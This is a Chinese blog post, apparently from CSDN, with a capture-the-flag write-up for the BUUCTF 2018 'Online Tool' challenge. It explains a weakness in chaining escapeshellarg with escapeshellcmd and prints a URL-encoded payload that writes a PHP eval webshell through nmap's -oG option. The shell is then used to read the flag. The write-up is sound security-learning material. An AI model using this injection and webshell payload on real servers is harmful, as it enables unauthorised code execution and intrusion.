BUUCTF 2018 在线工具

最新推荐文章于 2024-09-05 19:28:53 发布
最新推荐文章于 2024-09-05 19:28:53 发布
阅读量83 收藏
点赞数
文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yueyi17/article/details/129873223
版权

打开容器

代码审计发现escapeshellarg escapeshellcmd 两个函数具体不是很懂但是大概了解的是这两个函数会产生一个漏洞具体可看PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)这篇文章icon-default.png?t=N2N8https://paper.seebug.org/164/

然后试着写入一句话木马传参http://ab2ba401-3cd1-40c1-9022-cb5e61304c94.challenge.qsnctf.com:8081/?host=%27%20%3C?php%20@eval($_POST[%22hack%22]);?%3E%20-oG%20hack.php%20%27%20?host=\%27%20%3C?php%20@eval($_POST[%22hack%22]);?%3E%20-oG%20hack.php%20\%27%20//escapeshellarg()%E6%89%A7%E8%A1%8C%20?host=%27%27\\%27%27%20\%3C\?php%20\@eval\(\$_POST\[%22hack%22\]\);\?\%3E%20-oG%20hack.php%20%27%27\\%27%27 ?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

写入之后会回显地址 

 然后进入链接

发现传输成功然后用蚁剑连接

打开虚拟终端

cat /flag

得到flag

参考文章https://www.cnblogs.com/oldliutou/p/15785396.html

 

yueyi17
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BUUCTF 2018]Online Tool
bazzza的博客
12-25 267
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell函数,并且还是确保安全的。对于用户输入的部参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。 escapeshellcmd — shell 元字符转义 escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任.
BUUCTF 2018 Online Tool
热门推荐
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
BUUCTF 2018-Online Tool
paidx0
08-17 277
BUUCTF 2018-Online Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = esc
[CTFTraining] BUUCTF 2018 在线工具
ZXW_NUDT的博客
06-05 1699
[CTFTraining] BUUCTF 2018 在线工具
BUUCTF(1~10题wp)
weixin_59531848的博客
05-31 352
通过漏洞泄露puts函数的真实地址,并计算出libc基址。然后,构造合适的ROP链来调用system函数,并传递"/bin/sh"字符串作为参数,从而获取shell权限。找到函数地址:首先,使用ELF模块获取目标二进制文件中函数的地址。在脚本中,通过elf.plt和elf.got来获取puts函数的plt和got表项的地址,以及encrypt和main函数的地址。构造漏洞触发payload:在脚本中,通过构造一系列的字节串来构造payload。首先,用填充到缓冲区,然后利用和puts_got地址,以及。
[XNUCA2018]Warmup(考点:流量包文件提取,RSA共模攻击)
MikeCoke的博客
02-18 658
题目: from Crypto.Util.number import bytes_to_long, getPrime from random import randint from gmpy2 import powmod import sys p = getPrime(1024) q = getPrime(1024) N = p*q Phi = (p-1)*(q-1) with open("flag", 'r') as fr: flag = bytes_to_long(fr.read().strip(
[BUUCTF 2018]Online Tool1
m0_73673698的博客
06-08 669
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
BUUCTF-[INSHack2018](not) so deep
m0_67507776的博客
05-03 993
1.解压打开发现一段wav音频文件,首先利用音频析软件查看频谱图,使用audition打开发现flag前半段 2.使用DeepSound工具寻找音频隐写文件,发现需要密码,证明有隐藏内容 3.第一步使用deepsound2john.py脚本爆破文件得到hash值 #! python3 import logging import os import sys import textwrap def decode_data_low(buf): return buf[::2] d..
BUUCTF-[XMAN2018排位赛]ppap
m0_67507776的博客
05-08 417
1.使用wireshark析题目中的流量包,追踪TCP流,将Ayy, I got yer files right here, matey!之后的base64编码复制另存 2.将得到的base64编码为三段内容,第一段为~~~~之前的部,第二段为~~~~至And here be the map to the booty!之间的部,第三段为And here be the map to the booty!之后的部别进行解码 4.base64解码第一部得到jpg文件 ..
BUUCTF-[QCTF2018]X-man-Keyword
m0_67507776的博客
05-02 2042
1.开局一张图片 2.用binwalk、stegsolve等没有发现异常。在kali用LSB-cloacked-pixel-master工具有内容 python2 lsb.py extract attachment.png 001.txt lovekfc 3.查看txt文本,得到密文 PVSF{vVckHejqBOVX9C1c13GFfkHJrjIQeMwf} 4.根据提示将keyword放到前面,从26个英文字母里把 “lovekfc”提出来放到前面制作密钥 lovekfca..
BUUCTF:【x_nuca_2018_offbyone2】(off by null)
weixin_51055545的博客
01-06 1312
在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
从0开始的CTF个人练习生涯
CHTXRT的博客
09-03 394
就此离开,没人会受伤
中间件解析漏洞
最新发布
m0_73771249的博客
09-05 654
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏。
手动安装 composer.phar
昊喵喵博士
09-04 340
将 composer.phar 文件 放在你要安装的目录下 ,然后进入cmd命令框,输入以下命令就会多出一个 composer.bat 文件 代表安装成功。
wordpress发送邮件的方法?怎么配置功能?
danplus的博客
09-04 859
通过上述步骤,你应该已经掌握了如何在WordPress中发送邮件的方法和配置功能。AokSend,WordPress邮件发送新选择,API与SMTP接口融合,提升网站通讯效率,让邮件营销更出色!
windows安装composer
ice_mocha的博客
09-04 960
Composer 是一个用于PHP的依赖管理工具。Composer允许你声明你的PHP项目所依赖的库,并管理它们。它会安装和更新你项目所需要的库。
buuctf工具该从哪里下载
06-08
您可以从BUUCTF的官方网站...在该网站上,您可以找到BUUCTF工具的下载链接以及相关的说明文档。另外,您也可以在BUUCTF的GitHub仓库(https://github.com/BUUCTF)中找到BUUCTF工具的源代码和编译好的二进制文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值